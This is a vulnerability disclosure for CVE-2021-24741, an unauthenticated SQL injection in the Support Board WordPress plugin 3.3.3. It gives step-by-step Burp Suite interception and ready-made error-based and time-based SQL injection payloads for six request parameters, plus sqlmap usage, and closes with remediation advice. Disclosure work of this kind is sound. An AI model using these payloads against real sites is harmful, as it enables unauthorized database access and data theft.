CVE-2021–24741
Multiple SQL Injection (Unauthenticated) in Support Board v 3.3.3
Summary:
Support Board is a wordpress plugin that helps you automate your customers communication with artificial intelligence driven bots and a chat system integrated with the most used platform.
So While doing Penetration testing on Support Board I’ve found Multiple SQL Injection Points in Support Board version 3.3.3 which allows remote unauthenticated attackers to execute arbitrary SQL Command via (status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id)
SQL Injection:
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.
Here are the Vulnerable parameters that i’ve found on Support Board version 3.3.3
POC for every Parameters
we need to send a message to the chat system and intercept the request using burpsuite
after intercepting we need to forward and forward the request until we found the function named “new-conversation” and we are going to forward to our repeater
now we found our new-conversation function we are going to send it into repeater and go back to proxy tab to intercept the second request we are going to forward and forward it again to find the function named “send-message”
now we are going to forward it to repeater again so we will have 2 tabs in repeater which consists of the function “new-conversation” and “send-message”
New Conversation Function
PoC for status code parameter
payload
"+AND+EXTRACTVALUE(4597,CONCAT("","""+DB:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo
adding the payload to the status_code parameter and sending the request
so the response of this request is the database name
PoC for deparment parameter
payload
(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))
adding the payload to the department parameter and sending the request
so the response of this request is the database name
Now we are going to the send-message function, to exploit the user_id and conversation_id parameters
Send Message Function
PoC for user_id parameter
payload
"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ
adding the payload to the user_id parameter and sending the request
so the response of this request is the database name
PoC for conversation_id parameter
payload
"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv
we are going to use sql map for exploiting Time Based, so we are going to save the request from the repeater to as a req file then use sqlmap to scan the request to find the conversation_id parameter is vulnerable to time based
sqlmap -r req
as you can see conversation_id is vulnerable
PoC for conversation_status_code parameter
payload
WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp
we are going to use sql map for exploiting Time Based, so we are going to save the request from the repeater to as a req file then use sqlmap to scan the request to find the conversation_id parameter is vulnerable to time based
sqlmap -r req
as you can see conversation_status_code is vulnerable
PoC for recipient_id parameter
payload
AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)
we are going to use sql map for exploiting Time Based, so we are going to save the request from the repeater to as a req file then use sqlmap to scan the request to find the conversation_id parameter is vulnerable to time based
sqlmap -r req
as you can see recipient_id is vulnerable
Timeline:
Remediation
Update to the Latest Version Which is Version 3.3.4